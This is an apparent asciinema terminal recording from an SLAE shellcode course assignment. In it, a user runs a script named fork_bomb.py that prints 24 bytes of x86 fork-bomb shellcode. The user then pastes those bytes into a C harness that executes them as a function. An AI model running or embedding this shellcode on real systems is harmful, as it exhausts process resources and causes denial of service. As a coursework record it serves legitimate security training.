{"version": 2, "width": 80, "height": 24, "timestamp": 1534943550, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.01994, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004h\u001b[c\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;24r\u001b]112\u0007\u001b[2;4H\u001b[?2004h"]
[0.020796, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.028451, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;24r\u001b[2;4H\u001b[?2004h"]
[0.029696, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.127481, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.237169, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.23955, "o", "\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 39m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.682119, "o", "."]
[1.440504, "o", "\b./"]
[2.768906, "o", "f"]
[2.912197, "o", "o"]
[2.98411, "o", "r"]
[3.17664, "o", "k"]
[5.295564, "o", "_"]
[5.599484, "o", "m"]
[5.897028, "o", "\u0007"]
[5.897353, "o", "\bbomb.py"]
[5.897548, "o", "\r"]
[5.897705, "o", "\r\n"]
[5.8979, "o", "Completing corrections"]
[5.898044, "o", "\r\n"]
[5.898391, "o", "\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*   \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*"]
[5.898554, "o", "\r\n"]
[5.898699, "o", "Completing original"]
[5.898835, "o", "\r\n"]
[5.898998, "o", "\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;1H\u001b[K./fork_m\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;9H\u001b[K\u001b[1;24r\u001b[2;4H"]
[5.899154, "o", "./fork_bomb.py\u001b[K"]
[6.215974, "o", "\u001b[7Dnop.cast"]
[7.689556, "o", "\b \b"]
[7.848263, "o", "\b \b"]
[8.023834, "o", "\b \b"]
[8.208346, "o", "\b \b"]
[8.391496, "o", "\b \b"]
[8.592715, "o", "\b \b"]
[8.792379, "o", "\b \b"]
[8.983502, "o", "\b \b"]
[9.055603, "o", "b"]
[9.199589, "o", "o"]
[9.388324, "o", "mb.py\u001b[1m \u001b(B\u001b[m"]
[10.05456, "o", "\b -"]
[10.091348, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -\u001b[K\r\nCompleting corrections\u001b[K\r\n\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*   \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*\u001b[K\r\nCompleting original\u001b[K\r\n./fork_m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 39m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5"]
[10.09167, "o", ";39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;20H\u001b[?12l\u001b[?25h"]
[10.173856, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -\u001b[K\r\nCompleting corrections\u001b[K\r\n\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*   \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*\u001b[K\r\nCompleting original\u001b[K\r\n./fork_m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 39m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5"]
[10.17426, "o", ";39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;20H\u001b[?12l\u001b[?25h"]
[10.575291, "o", "N"]
[10.896498, "o", "\u001b[1;23r\u001b[4;23r\u001b[20S\u001b[3;1H\u001b[K\u001b[1;24r\u001b[3;1H\u001b[?2004l"]
[10.96984, "o", "Shellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8"]
[10.970172, "o", "\r\n"]
[10.970655, "o", "Length:  24"]
[10.970827, "o", "\r\n"]
[10.976016, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[6;1H \r"]
[10.978078, "o", "\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[6;60H\u001b(B\u001b[m"]
[10.978859, "o", "\r\n"]
[10.979123, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[10.979375, "o", "\u001b[K"]
[10.979765, "o", "\u001b[?2004h"]
[15.009016, "o", "v"]
[15.12052, "o", "\bvi"]
[15.32104, "o", "m"]
[15.375332, "o", " "]
[15.503945, "o", "s"]
[15.615377, "o", "h"]
[15.737324, "o", "ellcode"]
[16.112859, "o", "."]
[16.280933, "o", "c"]
[16.497403, "o", "\r\n\u001b[?2004l"]
[16.563813, "o", "\u001b]0;SLAE ❐ SLAE ● 1 vim\u0007\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 39m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 8"]
[16.567499, "o", "1% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[8;1H\u001b[?12l\u001b[?25h"]
[16.571713, "o", "\u001b[1;23r\u001b[2;23r\u001b[22S\u001b[1;1H\u001b[K\u001b[1;24r\u001b[1;1H"]
[16.596315, "o", "\u001b[23d\"shellcode.c\"\u001b[?25l"]
[16.599565, "o", " 19L, 312C"]
[16.625226, "o", "\u001b[H\u001b[34m/*\r\n * Put your assembler file here\r\n */\u001b[5;1H\u001b[35m#include\u001b[31m<stdio.h>\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[8;1H\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[9;24H\u001b[31m\"\u001b[35m\\x31\\xc0\\x90\\x83\\xf8\\x77\\xb0\\x02\\x87\\xdb\\xcd\\x80\\xeb\\xf22\r\u001b[31m\"\u001b[39m;\u001b[13;1H\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\r\n{\u001b[15;9Hprintf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[16;9H\u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[17;9Hret();\r\n}\u001b[21;1H\u001b[94m"]
[16.626336, "o", "~                                                                               \u001b[22;1H~                                                                               \u001b[23;63H\u001b[39m9,68-82\u001b[7CAll\u001b[10;2H\u001b[?12l\u001b[?25h"]
[16.705504, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x31\\xc0\\x90\\x83\\xf8\\x77\\xb0\\x02\\x87\\xdb\\xcd\\x80\\xeb\\xf2\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strle"]
[16.706839, "o", "n(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\"shellcode.c\" 19L, 312C                                       9,68-82       All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;2H\u001b[?12l\u001b[?25h"]
[16.824673, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x31\\xc0\\x90\\x83\\xf8\\x77\\xb0\\x02\\x87\\xdb\\xcd\\x80\\xeb\\xf2\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strle"]
[16.825012, "o", "n(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m\"shellcode.c\" 19L, 312C                                       9,68-82       All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;2H\u001b[?12l\u001b[?25h"]
[18.105173, "o", "\u001b[23;53H~@k\u001b[3D   \u001b[7C8,24   \u001b[8;24H"]
[18.728193, "o", "\u001b[23;53H~@k\u001b[3D   \u001b[7C9,68-82\u001b[10;2H"]
[18.912375, "o", "\u001b[23;53Hd\u001b[10;2H"]
[19.135477, "o", "\u001b[23;54Hd\u001b[10;2H\u001b[?25l"]
[19.136214, "o", "\u001b[23;53H  \u001b[9;22r\u001b[9;1H\u001b[2M\u001b[21;1H\u001b[94m~                                                                               \u001b[22;1H~                                                                               \u001b[39m\u001b[23;1H\u001b[K\u001b[62C9,0-1\u001b[9CAll\u001b[1;24r\u001b[9;1H\u001b[?12l\u001b[?25h"]
[20.073618, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n"]
[20.074059, "o", "\u001b[K\r\n\u001b[94m~                                                                               \u001b[20;1H~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m                                                              9,0-1         All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 81% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;1H\u001b[?12l\u001b[?25h"]
[20.133256, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n"]
[20.133541, "o", "\u001b[K\r\n\u001b[94m~                                                                               \u001b[20;1H~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;1H\u001b[39m                                                              9,0-1         All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;1H\u001b[?12l\u001b[?25h"]
[20.375812, "o", "\u001b[23;53HI\b \r\u001b[1m-- INSERT --\u001b(B\u001b[m\u001b[50C\u001b[K9,1\u001b[11CAll\u001b[9;1H"]
[21.184093, "o", "\u001b[31m\"\u001b[23;65H\u001b[39m2\u001b[9;2H"]
[21.890318, "o", "\u001b[10;22r\u001b[10;1H\u001b[1L\u001b[9;2H\u001b[35m\\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x00\r2\\xcd\\x80\\xeb\\xe8\r\n\u001b[31m                       \u001b[1;24r\u001b[11;24H\u001b[?25l\u001b(B\u001b[m"]
[21.890944, "o", "\u001b[23;63H\u001b[K9,98\u001b[10CAll\u001b[10;18H\u001b[?12l\u001b[?25h"]
[22.808768, "o", "\u001b[31m\"\r\n\u001b[39m                       \u001b[23;66H9\u001b[10;19H"]
[23.634492, "o", ";\u001b[23;65H100\u001b[10;20H"]
[23.828725, "o", "\u001b[23;1H\u001b[K\u001b[52C^[\u001b[10;19H\u001b[?25l"]
[23.929478, "o", "\u001b[23;53H  \u001b[8C9,99\u001b[10CAll\u001b[10;19H\u001b[?12l\u001b[?25h"]
[24.000743, "o", "\u001b[23;53H:\b\u001b[K\r:"]
[24.128163, "o", "w"]
[24.199618, "o", "q"]
[24.335367, "o", "\r"]
[24.337135, "o", "\"shellcode.c\"\u001b[?25l"]
[24.344162, "o", " 18L, 342C written"]
[24.348044, "o", "\r"]
[24.348443, "o", "\u001b[1;23r\u001b[23;80H\n\u001b[1;24r\u001b[23;1H"]
[24.349239, "o", "\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -N\u001b[K\r\nShellcode:  \\x83\\xfb\\x3d\\x90\\x31\\xc0\\x83\\xfb\\x3d\\x83\\xf8\\xfa\\x83\\xf9\\xab\\x87\\xdb\\x90\\xb0\\x02\\xcd\\x80\\xeb\\xe8\u001b[K\r\nLength:  24\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[24.356631, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[8;1H \r"]
[24.357818, "o", "\u001b[1;23r\u001b[9;23r\u001b[15S\u001b[8;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[8;60H\u001b(B\u001b[m"]
[24.358001, "o", "\r\n"]
[24.358173, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[24.358504, "o", "\u001b[K"]
[24.358789, "o", "\u001b[?2004h"]
[24.705513, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 3h 40m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◼\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;154m 80% \u001b[38;5;245m| 15:12 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;4H\u001b[?12"]
[24.709457, "o", "l\u001b[?25h"]
[24.709802, "o", "."]
